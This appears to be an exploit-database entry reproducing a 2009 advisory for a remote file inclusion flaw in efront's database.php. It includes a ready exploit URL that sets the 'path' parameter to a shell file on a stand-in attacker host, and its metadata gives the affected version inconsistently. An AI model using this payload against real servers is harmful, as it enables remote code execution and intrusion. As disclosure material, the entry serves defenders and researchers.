efront - exploit.company

vendor:

efront

by:

cr4wl3r

9.3

CVSS

HIGH

Remote File Include

CWE

Product Name: efront

Affected Version From: 3.5.2004

Affected Version To: 3.5.2004

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

efront <= 3.5.4 Remote File Include Vulnerability

A vulnerability in efront <= 3.5.4 allows an attacker to include a remote file via the 'path' parameter in the 'database.php' script. This can be exploited to execute arbitrary PHP code by including a malicious file from a remote location.

Mitigation:

Upgrade to the latest version of efront.

Source

Exploit-DB raw data:

########################################################################
#efront <= 3.5.4 Remote File Include Vulnerability
#Download Script      :  http://sourceforge.net/projects/efrontlearning/files/
#Author               :  cr4wl3r 
#Contact              :  cr4wl3r[4t]linuxmail[dot]org 
#Location             :  Gorontalo - INDONESIA
########################################################################
#file :
#  database.php 
#line 15 require_once($path.'adodb/adodb.inc.php');
########################################################################
#3xplo!t :
#http://target.com/[path]/libraries/database.php?path=http://attacker.com/shell.txt???  
########################################################################
#Greetz        : MyMom [alm]
#Thanks 2      : opt!x hacker, xoron, irvian, cyberlog, EA ngel, bl4ck_3ng1n3, Hmei7, zvtral
########################################################################
#sekuritionline.net (all crew sekuritionline)
#manadocoding.net (all crew manadocoding)
########################################################################

# milw0rm.com [2009-09-15]